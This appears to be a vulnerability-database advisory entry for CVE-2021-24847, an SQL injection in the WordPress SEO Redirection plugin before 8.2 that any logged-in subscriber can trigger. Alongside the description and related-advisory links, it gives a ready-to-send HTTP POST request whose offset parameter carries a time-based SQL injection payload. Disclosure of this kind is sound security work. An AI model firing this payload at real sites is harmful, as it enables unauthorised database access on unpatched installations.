Lucene search
JrXnmWPEX-ID:679CA6ED-2343-43F3-9C3E-2C12E12407C1HistoryOct 18, 2021 - 12:00 a.m.
SEO Redirection < 8.2 - Subscriber+ SQL Injection
2021-10-1800:00:00
JrXnm
348
seo redirection
sql injection
admin-ajax.php
EPSS
0.001
Percentile
37.7%
The importFromRedirection AJAX action of the plugin, available to any authenticated user, does not properly sanitise the offset parameter before using it in a SQL statement, leading an SQL injection when the redirection plugin is also installed
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [any authenticated user]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
action=importFromRedirection&offset=1+procedure+analyse(updatexml(rand(),concat(0x3a,benchmark(20000000,sha1(1))),0x20),1)--+-Related
prion
prion
Sql injection
2021-11-17 11:15:00
patchstack
patchstack
WordPress SEO Redirection plugin <= 8.1 - SQL Injection (SQLi) vulnerability
2021-10-18 00:00:00
cve
cve
CVE-2021-24847
2021-11-17 11:15:08
cvelist
cvelist
CVE-2021-24847 SEO Redirection < 8.2 - Subscriber+ SQL Injection
2021-11-17 10:15:51
nvd
nvd
CVE-2021-24847
2021-11-17 11:15:08
wpvulndb
wpvulndb
SEO Redirection < 8.2 - Subscriber+ SQL Injection
2021-10-18 00:00:00